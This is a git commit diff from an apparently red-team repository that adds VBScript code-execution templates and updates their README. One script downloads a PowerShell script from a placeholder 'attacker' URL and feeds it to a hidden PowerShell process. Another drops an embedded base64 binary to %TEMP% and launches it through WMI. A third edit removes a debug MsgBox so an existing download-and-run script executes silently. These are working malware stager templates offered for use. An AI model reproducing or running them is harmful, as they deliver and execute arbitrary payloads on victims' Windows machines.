Added code-exec-templates and some additions to rogue-dot-net
This commit is contained in:
parent
b7c7da7b4e
commit
8b03b5ba40
|
@ -15,6 +15,10 @@ Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets usin
|
||||||
|
|
||||||
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
||||||
|
|
||||||
|
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
|
||||||
|
|
||||||
|
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
|
||||||
|
|
||||||
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
||||||
|
|
||||||
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
||||||
|
|
|
@ -29,9 +29,7 @@ If xhr.Status = 200 Then
|
||||||
|
|
||||||
' STEP 3: Execute file
|
' STEP 3: Execute file
|
||||||
cmd = out & " " & parameters
|
cmd = out & " " & parameters
|
||||||
MsgBox cmd
|
|
||||||
sh.Run cmd, 0, False
|
sh.Run cmd, 0, False
|
||||||
|
|
||||||
End If
|
End If
|
||||||
|
|
||||||
Set sh = Nothing
|
Set sh = Nothing
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
'
|
||||||
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
|
' local filesystem and then launching.
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
scriptURL = "http://attacker/script.ps1"
|
||||||
|
launcher = "powershell -nop -w hid -Command -"
|
||||||
|
|
||||||
|
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
|
||||||
|
xhr.Open "GET", scriptURL, False
|
||||||
|
xhr.Send
|
||||||
|
|
||||||
|
Function bin2a(Binary)
|
||||||
|
Dim I,S
|
||||||
|
For I = 1 to LenB(Binary)
|
||||||
|
S = S & Chr(AscB(MidB(Binary,I,1)))
|
||||||
|
Next
|
||||||
|
bin2a = S
|
||||||
|
End Function
|
||||||
|
|
||||||
|
If xhr.Status = 200 Then
|
||||||
|
With CreateObject("WScript.Shell")
|
||||||
|
With .Exec(launcher)
|
||||||
|
.StdIn.WriteLine bin2a(xhr.responseBody)
|
||||||
|
.StdIn.WriteBlankLines 1
|
||||||
|
.Terminate
|
||||||
|
End With
|
||||||
|
End With
|
||||||
|
End If
|
||||||
|
|
||||||
|
Set xhr = Nothing
|
|
@ -0,0 +1,47 @@
|
||||||
|
'
|
||||||
|
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
||||||
|
' decoding it and then launching.
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
saveFileAs = "%TEMP%\foo.exe"
|
||||||
|
launchParameters = ""
|
||||||
|
|
||||||
|
' =============================================================
|
||||||
|
|
||||||
|
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
|
||||||
|
|
||||||
|
' =============================================================
|
||||||
|
|
||||||
|
Function Base64Decode(ByVal vCode)
|
||||||
|
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
|
||||||
|
oNode.dataType = "bin.base64"
|
||||||
|
oNode.text = vCode
|
||||||
|
Base64Decode = oNode.nodeTypedValue
|
||||||
|
Set oNode = Nothing
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||||
|
out = sh.ExpandEnvironmentStrings(saveFileAs)
|
||||||
|
|
||||||
|
With CreateObject("Adodb.Stream")
|
||||||
|
.Open
|
||||||
|
.Type = 1
|
||||||
|
.write Base64Decode(fileBuffer)
|
||||||
|
.savetofile out, 2
|
||||||
|
End With
|
||||||
|
|
||||||
|
computer = "."
|
||||||
|
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||||
|
& computer & "\root\cimv2")
|
||||||
|
|
||||||
|
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||||
|
Set conf = startup.SpawnInstance_
|
||||||
|
conf.ShowWindow = 12
|
||||||
|
|
||||||
|
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||||
|
|
||||||
|
command = out & " " & launchParameters
|
||||||
|
proc.Create command, Null, conf, intProcessID
|
Loading…
Reference in New Issue